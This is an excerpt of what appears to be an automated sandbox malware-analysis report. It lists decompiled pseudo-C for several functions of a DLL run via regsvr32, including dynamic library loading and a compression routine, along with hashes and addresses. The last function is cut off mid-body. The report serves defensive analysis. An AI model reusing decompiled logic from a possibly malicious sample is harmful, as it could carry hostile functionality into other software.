                  • Instruction Fuzzy Hash: 7A617AB5D00209EFDB40CF98C881BADBBF1FF08355F208599E815AB2A1C774AA90DF50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117libraryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E1000C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x1001e688; // 0x2bb0590
				_t1 = _t50 + 0x1898; // 0x0
				_t14 =  *_t1;
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E100095E1(_t50, 0xb62);
					_t66 =  *0x1001e688; // 0x2bb0590
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E10009640( &_v140, 0x40, L"%08x", E1000D400(_t66 + 0xb0, E1000C379(_t66 + 0xb0), 0));
					_t20 =  *0x1001e688; // 0x2bb0590
					_t7 = _t20 + 0xa8; // 0x1
					asm("sbb eax, eax");
					_t25 = E100095E1(_t67, ( ~( *_t7) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x1001e688; // 0x2bb0590
					_t68 = E100092E5(_t26 + 0x1020);
					_v12 = _t68;
					E100085D5( &_v8);
					_t32 =  *0x1001e688; // 0x2bb0590
					_t34 = E100092E5(_t32 + 0x122a);
					 *0x1001e784 = _t34;
					_t35 =  *0x1001e684; // 0x2c2faa0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x1001e784);
					 *0x1001e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E1000E171(0x1001bb48, _t60);
					}
					 *0x1001e780 = _t38;
					E1000861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x1001e780 != 0) {
						goto L10;
					} else {
						E1000861A(0x1001e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x1001e780 == 0) {
						_t46 =  *0x1001e6bc; // 0x2c2fbc8
						 *0x1001e780 = _t46;
					}
					L10:
					return 1;
				}
			}


























                  0x1000c4ce
                  0x1000c4ce
                  0x1000c4ce
                  0x1000c4d1
                  0x1000c4dd
                  0x1000c4dd
                  0x1000c4e8
                  0x1000c504
                  0x1000c509
                  0x1000c512
                  0x1000c514
                  0x1000c51c
                  0x1000c53d
                  0x1000c542
                  0x1000c547
                  0x1000c54f
                  0x1000c55a
                  0x1000c561
                  0x1000c568
                  0x1000c579
                  0x1000c57f
                  0x1000c582
                  0x1000c599
                  0x1000c5a5
                  0x1000c5ad
                  0x1000c5b4
                  0x1000c5ba
                  0x1000c5c6
                  0x1000c5cc
                  0x1000c5d3
                  0x1000c5e6
                  0x1000c5d5
                  0x1000c5d5
                  0x1000c5d8
                  0x1000c5de
                  0x1000c5e3
                  0x1000c5e8
                  0x1000c5f3
                  0x1000c605
                  0x1000c617
                  0x00000000
                  0x1000c619
                  0x1000c620
                  0x00000000
                  0x1000c626
                  0x1000c627
                  0x1000c627
                  0x1000c62e
                  0x1000c630
                  0x1000c635
                  0x1000c635
                  0x1000c63a
                  0x1000c63e
                  0x1000c63e

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: LibraryLoadmemset
                  • String ID: %08x$dll
                  • API String ID: 3406617148-2963171978
                  • Opcode ID: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
                  • Instruction ID: 605655cd81f1f69b7fa92b991eeeb1d6cfabf96bce0b9214bc1f1ebdb38bd664
                  • Opcode Fuzzy Hash: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
                  • Instruction Fuzzy Hash: 3331E3B2904358ABFB10CBA4DC89F9E33ECEB58394F408029F105E7191EB35EE818724
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10012D70, Relevance: 6.6, APIs: 5, Instructions: 341COMMON
                  Download Yara Rule
                  C-Code - Quality: 99%
                  			E10012D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E10015D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E10014AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E10014C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t111 = _a4 + 4; // 0x0
						_t220 =  *_t111;
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E10014C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E10015D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E10014AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































                  0x10012d76
                  0x10012d7b
                  0x10012d7f
                  0x10012d82
                  0x10012d82
                  0x10012d85
                  0x10012d8a
                  0x10012d8f
                  0x10012d92
                  0x10012d97
                  0x10012d9a
                  0x10012da0
                  0x10012da0
                  0x10012dab
                  0x10012dae
                  0x10012db5
                  0x10012dba
                  0x00000000
                  0x00000000
                  0x10012dc0
                  0x10012dc5
                  0x10012dc5
                  0x10012dca
                  0x10012dd0
                  0x10012dda
                  0x10012ddf
                  0x10012de5
                  0x10012e04
                  0x10012e07
                  0x10012e12
                  0x10012e12
                  0x10012e12
                  0x10012e09
                  0x10012e09
                  0x10012e0b
                  0x00000000
                  0x10012e0d
                  0x10012e0d
                  0x10012e0d
                  0x10012e0b
                  0x10012e1a
                  0x10012e1f
                  0x10012e24
                  0x10012e2a
                  0x10012e2e
                  0x10012e31
                  0x10012e34
                  0x10012e3a
                  0x10012e3f
                  0x10012e42
                  0x10012e48
                  0x10012e4d
                  0x10012e53
                  0x10012e59
                  0x10012e5e
                  0x10012e61
                  0x10012e66
                  0x10012e6a
                  0x10012e6e
                  0x10012e71
                  0x10012e74
                  0x10012e7d
                  0x10012e84
                  0x10012e87
                  0x10012e8a
                  0x10012e8f
                  0x10012e94
                  0x10012e97
                  0x10012e9a
                  0x10012e9a
                  0x10012e9e
                  0x10012ea7
                  0x10012eae
                  0x10012eb1
                  0x10012eb6
                  0x10012ebb
                  0x10012ebb
                  0x10012ebe
                  0x10012ec3
                  0x00000000
                  0x00000000
                  0x10012de7
                  0x10012de9
                  0x10012df6
                  0x00000000
                  0x00000000
                  0x10012df6
                  0x10012de9
                  0x00000000
                  0x10012de5
                  0x10012ec9
                  0x10012ece
                  0x10012ed1
                  0x10012ed4
                  0x10012f7f
                  0x10012f7f
                  0x10012eda
                  0x10012eda
                  0x10012eda
                  0x10012edf
                  0x10012f09
                  0x10012f0c
                  0x10012f0c
                  0x10012f11
                  0x10012f13
                  0x10012f15
                  0x10012f18
                  0x10012f1b
                  0x10012f23
                  0x10012f28
                  0x10012f28
                  0x10012f2e
                  0x10012f31
                  0x10012f34
                  0x10012f37
                  0x10012f39
                  0x10012f39
                  0x10012f3a
                  0x10012f3a
                  0x10012f37
                  0x10012f48
                  0x10012f4b
                  0x10012f4f
                  0x10012f54
                  0x10012f57
                  0x10012f5a
                  0x10012f5a
                  0x10012f5a
                  0x10012f5d
                  0x10012f5d
                  0x10012f60
                  0x10012f60
                  0x10012ee1
                  0x10012ee1
                  0x10012ef1
                  0x10012ef4
                  0x10012ef9
                  0x10012ef9
                  0x10012efc
                  0x10012eff
                  0x10012f02
                  0x10012f04
                  0x10012f04
                  0x10012f63
                  0x10012f65
                  0x10012f68
                  0x10012f68
                  0x10012f6e
                  0x10012f72
                  0x10012f75
                  0x10012f77
                  0x10012f77
                  0x10012f88
                  0x10012f8a
                  0x10012f8a
                  0x10012f92
                  0x10012fa0
                  0x10012fa3
                  0x10012fa5
                  0x10012fc5
                  0x10012fc5
                  0x10012fc8
                  0x10012fce
                  0x10012fcf
                  0x10012fd2
                  0x10012fd4
                  0x10012fd7
                  0x10012fda
                  0x10012fdd
                  0x10012fe1
                  0x10012fe4
                  0x10012fe7
                  0x10012fea
                  0x10012fec
                  0x10012fec
                  0x10012fef
                  0x10012ff1
                  0x10012ff1
                  0x10012ff4
                  0x10012ff6
                  0x10012ff9
                  0x10013001
                  0x10013004
                  0x10013009
                  0x10013009
                  0x1001300f
                  0x10013012
                  0x10013015
                  0x10013017
                  0x10013017
                  0x10013018
                  0x10013018
                  0x10013023
                  0x10013023
                  0x10013023
                  0x10013026
                  0x10013029
                  0x10013029
                  0x1001302c
                  0x1001302c
                  0x10012fef
                  0x10013032
                  0x10013032
                  0x10013035
                  0x10013037
                  0x1001303a
                  0x1001303c
                  0x1001303f
                  0x10013042
                  0x10013044
                  0x10013047
                  0x1001304f
                  0x10013057
                  0x1001305a
                  0x1001305a
                  0x1001305a
                  0x1001305d
                  0x1001305d
                  0x1001305d
                  0x10013060
                  0x10013066
                  0x10013068
                  0x10013068
                  0x1001306e
                  0x10013074
                  0x1001307d
                  0x10013084
                  0x10013086
                  0x10013089
                  0x10013089
                  0x1001308c
                  0x1001308c
                  0x1001308f
                  0x10013091
                  0x10013094
                  0x10013096
                  0x100130b1
                  0x100130b1
                  0x100130b5
                  0x100130b8
                  0x100130bb
                  0x100130be
                  0x100130d4
                  0x100130d4
                  0x100130d4
                  0x100130c0
                  0x100130c0
                  0x100130c2
                  0x100130c6
                  0x100130c9
                  0x00000000
                  0x100130cb
                  0x100130cb
                  0x100130cd
                  0x00000000
                  0x100130cf
                  0x100130cf
                  0x100130cf
                  0x100130cd
                  0x100130c9
                  0x100130d8
                  0x100130db
                  0x100130e0
                  0x100130ea
                  0x100130ea
                  0x100130ea
                  0x100130ed
                  0x10013098
                  0x10013098
                  0x1001309a
                  0x100130a1
                  0x100130a1
                  0x100130a3
                  0x100130a5
                  0x100130a7
                  0x100130ab
                  0x100130ad
                  0x100130af
                  0x00000000
                  0x00000000
                  0x100130af
                  0x100130ab
                  0x1001309c
                  0x1001309c
                  0x1001309f
                  0x00000000
                  0x00000000
                  0x1001309f
                  0x1001309a
                  0x100130f7
                  0x100130f9
                  0x100130f9
                  0x10013104
                  0x10012fa7
                  0x10012fa7
                  0x10012faa
                  0x00000000
                  0x10012fac
                  0x10012fac
                  0x10012fae
                  0x10012fb2
                  0x00000000
                  0x10012fb4
                  0x10012fb4
                  0x10012fb4
                  0x10012fb7
                  0x00000000
                  0x10012fbb
                  0x10012fc4
                  0x10012fc4
                  0x10012fb7
                  0x10012fb2
                  0x10012faa
                  0x10012f96
                  0x10012f9f
                  0x10012f9f

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID:
                  • API String ID: 3510742995-0
                  • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                  • Instruction ID: 4fdc6b10e7b7168a0789f31eb0048a9ad86d4efd395f939b62a688ab4a7349d5
                  • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                  • Instruction Fuzzy Hash: FAD112B5600A009FCB24CF69D8D4A6AB7F1FF88344B25892DE88ACB711D771E9958B50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10004D6D, Relevance: 6.4, APIs: 4, Instructions: 432stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 70%
                  			E10004D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				signed int _t122;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x1001e688; // 0x2bb0590
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t14 = E1000B7A8(0x1001b9c8,  &_v516) + 1; // 0x1
					E1000A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E1000A471( &_v556, _t298);
					 *0x1001e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						 *0x1001e680 = E1000E1BC(0x1001b9cc, _t299);
						 *_t337 = 0x610;
						_t124 = E100095E1(0x1001b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x1001e688; // 0x2bb0590
						_t127 = E100092E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E100085D5( &_v612);
						_t130 = E1000B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E1000861A( &_v616, 0xfffffffe);
						_t133 =  *0x1001e688; // 0x2bb0590
						_t21 = _t133 + 0x110; // 0x2c2fd98
						_t22 = _t133 + 0x114; // 0x2bb06a4
						E10004A0B( *((intOrPtr*)( *_t21)), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x1001e688; // 0x2bb0590
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_t28 = _t262 + 0x214; // 0x2
							_v576 =  *_t28;
							_t137 =  *0x1001e680; // 0x0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564);
							}
							_v620 = _v620 & 0x00000000;
							E1000E2C6(_t353,  &_v576);
							_pop(_t262);
							_t142 =  *0x1001e6b4; // 0x2c2fc48
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E1000E2C6(_t353,  &_v588);
								_t235 =  *0x1001e6b4; // 0x2c2fc48
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x1001e73c;
							if( *0x1001e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x1001e680; // 0x0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x1001e688; // 0x2bb0590
								_t45 = _t166 + 0x214; // 0x2
								_t262 =  *_t45;
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E100049A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x1001e684; // 0x2c2faa0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x1001e688; // 0x2bb0590
											_t184 = E1000FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E10008604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E1000109A(_t262, 0x148);
													_t305 =  *0x1001e688; // 0x2bb0590
													_v636 = _t186;
